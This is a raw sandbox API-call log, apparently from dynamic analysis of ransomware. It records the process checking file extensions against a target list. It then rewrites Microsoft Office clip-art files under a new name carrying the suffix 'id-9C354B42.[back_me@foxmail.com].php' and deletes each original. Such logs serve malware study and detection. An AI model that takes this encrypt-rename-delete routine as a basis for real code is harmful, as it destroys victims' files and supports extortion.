lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.111] lstrlenW (lpString=".dbf") returned 4 [0264.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.111] lstrlenW (lpString=".1cd") returned 4 [0264.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.111] lstrlenW (lpString=".jpg") returned 4 [0264.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.111] lstrlenW (lpString=".doc") returned 4 [0264.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString=".docx") returned 5 [0264.111] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0264.111] lstrlenW (lpString=".pdf") returned 4 [0264.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString=".xls") returned 4 [0264.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.111] lstrlenW (lpString=".xlsx") returned 5 [0264.111] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0264.111] lstrlenW (lpString=".ppt") returned 4 [0264.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.112] lstrlenW (lpString=".zip") returned 4 [0264.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.112] lstrlenW (lpString=".rar") returned 4 [0264.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.112] lstrlenW (lpString=".bz2") returned 4 [0264.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.112] lstrlenW (lpString=".7z") returned 3 [0264.112] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.112] lstrlenW (lpString=".dbf") returned 4 [0264.112] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.112] lstrlenW (lpString=".1cd") returned 4 [0264.112] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63 [0264.112] lstrlenW (lpString=".jpg") returned 4 [0264.112] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.112] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.112] lstrlenW (lpString="J0152898.WMF") returned 12 [0264.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.113] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=4496) returned 1 [0264.113] CloseHandle (hObject=0x3e4) returned 1 [0264.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf")) returned 0x20 [0264.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0264.113] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.113] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.114] GetLastError () returned 0x0 [0264.114] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x1190, lpOverlapped=0x0) returned 1 [0264.115] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x11a0, lpOverlapped=0x0) returned 1 [0264.116] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.116] WriteFile (in: hFile=0x3b4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.116] SetEndOfFile (hFile=0x3b4) returned 1 [0264.116] CloseHandle (hObject=0x3b4) returned 1 [0264.116] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.116] SetEndOfFile (hFile=0x3e4) returned 1 [0264.118] CloseHandle (hObject=0x3e4) returned 1 [0264.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf")) returned 1 [0264.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.119] lstrlenW (lpString=".doc") returned 4 [0264.119] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.119] lstrlenW (lpString=".docx") returned 5 [0264.119] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0264.119] lstrlenW (lpString=".pdf") returned 4 [0264.119] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.119] lstrlenW (lpString=".xls") returned 4 [0264.119] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.119] lstrlenW (lpString=".xlsx") returned 5 [0264.119] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.119] lstrlenW (lpString=".ppt") returned 4 [0264.119] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.119] lstrlenW (lpString=".zip") returned 4 [0264.119] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.119] lstrlenW (lpString=".rar") returned 4 [0264.119] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.119] lstrlenW (lpString=".bz2") returned 4 [0264.119] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.119] lstrlenW (lpString=".7z") returned 3 [0264.119] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString=".dbf") returned 4 [0264.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString=".1cd") returned 4 [0264.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString=".jpg") returned 4 [0264.120] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString=".doc") returned 4 [0264.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString=".docx") returned 5 [0264.120] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0264.120] lstrlenW (lpString=".pdf") returned 4 [0264.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString=".xls") returned 4 [0264.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.120] lstrlenW (lpString=".xlsx") returned 5 [0264.120] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0264.120] lstrlenW (lpString=".ppt") returned 4 [0264.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.120] lstrlenW (lpString=".zip") returned 4 [0264.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.120] lstrlenW (lpString=".rar") returned 4 [0264.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString=".bz2") returned 4 [0264.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.120] lstrlenW (lpString=".7z") returned 3 [0264.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.121] lstrlenW (lpString=".dbf") returned 4 [0264.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.121] lstrlenW (lpString=".1cd") returned 4 [0264.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63 [0264.121] lstrlenW (lpString=".jpg") returned 4 [0264.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.121] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.121] lstrlenW (lpString="J0153047.WMF") returned 12 [0264.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.122] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=33068) returned 1 [0264.122] CloseHandle (hObject=0x3b4) returned 1 [0264.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf")) returned 0x20 [0264.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.123] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.123] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.123] GetLastError () returned 0x0 [0264.123] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x812c, lpOverlapped=0x0) returned 1 [0264.225] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x8130, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x8130, lpOverlapped=0x0) returned 1 [0264.227] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.227] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.227] SetEndOfFile (hFile=0x318) returned 1 [0264.227] CloseHandle (hObject=0x318) returned 1 [0264.227] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.227] SetEndOfFile (hFile=0x3b4) returned 1 [0264.229] CloseHandle (hObject=0x3b4) returned 1 [0264.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.230] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf")) returned 1 [0264.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.230] lstrlenW (lpString=".doc") returned 4 [0264.230] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.230] lstrlenW (lpString=".docx") returned 5 [0264.230] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.230] lstrlenW (lpString=".pdf") returned 4 [0264.230] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.230] lstrlenW (lpString=".xls") returned 4 [0264.230] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.230] lstrlenW (lpString=".xlsx") returned 5 [0264.230] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.230] lstrlenW (lpString=".ppt") returned 4 [0264.230] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.230] lstrlenW (lpString=".zip") returned 4 [0264.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.230] lstrlenW (lpString=".rar") returned 4 [0264.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.230] lstrlenW (lpString=".bz2") returned 4 [0264.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.230] lstrlenW (lpString=".7z") returned 3 [0264.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString=".dbf") returned 4 [0264.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString=".1cd") returned 4 [0264.231] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString=".jpg") returned 4 [0264.231] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString=".doc") returned 4 [0264.231] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString=".docx") returned 5 [0264.231] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0264.231] lstrlenW (lpString=".pdf") returned 4 [0264.231] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString=".xls") returned 4 [0264.231] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.231] lstrlenW (lpString=".xlsx") returned 5 [0264.231] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0264.231] lstrlenW (lpString=".ppt") returned 4 [0264.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.231] lstrlenW (lpString=".zip") returned 4 [0264.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.231] lstrlenW (lpString=".rar") returned 4 [0264.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString=".bz2") returned 4 [0264.231] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.231] lstrlenW (lpString=".7z") returned 3 [0264.231] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.232] lstrlenW (lpString=".dbf") returned 4 [0264.232] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.232] lstrlenW (lpString=".1cd") returned 4 [0264.232] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63 [0264.232] lstrlenW (lpString=".jpg") returned 4 [0264.232] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.232] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0264.232] lstrlenW (lpString="J0153516.WMF") returned 12 [0264.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.232] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=7432) returned 1 [0264.232] CloseHandle (hObject=0x3b4) returned 1 [0264.232] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf")) returned 0x20 [0264.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.233] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.233] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.234] GetLastError () returned 0x0 [0264.234] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x1d08, lpOverlapped=0x0) returned 1 [0264.235] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x1d10, lpOverlapped=0x0) returned 1 [0264.236] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.236] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.236] SetEndOfFile (hFile=0x318) returned 1 [0264.236] CloseHandle (hObject=0x318) returned 1 [0264.236] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.236] SetEndOfFile (hFile=0x3b4) returned 1 [0264.238] CloseHandle (hObject=0x3b4) returned 1 [0264.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf")) returned 1 [0264.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.239] lstrlenW (lpString=".doc") returned 4 [0264.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0264.239] lstrlenW (lpString=".docx") returned 5 [0264.239] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0264.239] lstrlenW (lpString=".pdf") returned 4 [0264.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0264.239] lstrlenW (lpString=".xls") returned 4 [0264.239] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0264.239] lstrlenW (lpString=".xlsx") returned 5 [0264.239] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0264.239] lstrlenW (lpString=".ppt") returned 4 [0264.239] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0264.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.239] lstrlenW (lpString=".zip") returned 4 [0264.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0264.239] lstrlenW (lpString=".rar") returned 4 [0264.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0264.239] lstrlenW (lpString=".bz2") returned 4 [0264.239] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0264.239] lstrlenW (lpString=".7z") returned 3 [0264.239] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0264.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.239] lstrlenW (lpString=".dbf") returned 4 [0264.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.240] lstrlenW (lpString=".1cd") returned 4 [0264.240] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.240] lstrlenW (lpString=".jpg") returned 4 [0264.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 [0264.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63 